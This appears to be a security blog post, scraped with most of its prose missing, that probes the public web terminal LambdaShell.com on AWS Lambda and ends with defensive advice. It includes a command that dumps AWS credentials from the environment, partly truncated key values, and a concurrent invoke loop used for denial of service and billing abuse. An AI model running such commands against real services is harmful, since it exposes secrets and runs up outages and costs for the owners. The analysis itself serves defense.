Looking at LambdaShell.com after 3+ years

Terminal

Functions

user@host:~ echo $AWS_EXECUTION_ENV
AWS_Lambda_nodejs12.x
Lambda Shell’s index.js

Permissions

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "logs:CreateLogGroup",
"Resource": "arn:aws:logs:us-east-1:123456789012:*"
},
{
"Effect": "Allow",
"Action": [
"logs:CreateLogStream",
"logs:PutLogEvents"
],
"Resource": [
"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/example:*"
]
}
]
}
user@host:~ export | awk '/ACCESS|SECRET|REGION|TOKEN/'
export AWS_ACCESS_KEY_ID="ASIARZMXIAFTJE4ZPUFD"
export AWS_DEFAULT_REGION="us-west-1"
export AWS_REGION="us-west-1"
export AWS_SECRET_ACCESS_KEY="2EpQgqqOQOF1+W...doNkkRDqJklWCV9"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjE...Yyd/fKl8zzP3ZnQA=="

Lambda

Redis

API Gateway

X-Ray

user@host:~ echo $_X_AMZN_TRACE_ID
Root=1-61c329d4-6bc7e7421dee02f5235e9cc4;Parent=67bab5d2e727bc1d;Sampled=1

Logs

Denial of service

user@host:~ sleep 16m
2021-12-22T14:41:40.843Z cef17277-fb37-4f18-a10d-edeb969ad426 Task timed out after 10.01 seconds
for i in {1..10}; do aws lambda invoke --function-name exec \
--payload '{"body":{"command":"sleep 10s"}}' \
--cli-binary-format raw-in-base64-out /dev/null & done

Spend

Lambda

cat /var/runtime/*.** && cat /var/runtime/*.** && cat /var/runtime/*.** && cat /var/runtime/*.** && cat /var/runtime/*.** && cat /var/runtime/*.**

X-Ray

CloudWatch Logs

CloudWatch Metrics

{
"_aws": {
"Timestamp": 1574109732004,
"CloudWatchMetrics": [
{
"Namespace": "lambda-function-metrics",
"Dimensions": [["functionVersion"]],
"Metrics": [
{
"Name": "time",
"Unit": "Milliseconds"
}
]
}
]
},
"functionVersion": "$LATEST",
"time": 100,
"requestId": "989ffbf8-9ace-4817-a57c-e4dd734019ee"
}

Bonus: S3

Conclusion

  • Do what you can to keep even the most basic credentials secure.
  • Sanitize user inputs and outputs to avoid leaking credentials.
  • Ensure you have billing alarms configured to catch anything like this ASAP.
  • Follow the principle of least privilege (remove unnecessary permissions and don’t use "*" as a resource in an IAM policy).
  • Apply throttling and limits where possible.
  • Be aware of all regions, not just the one you expect resources to exist in.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store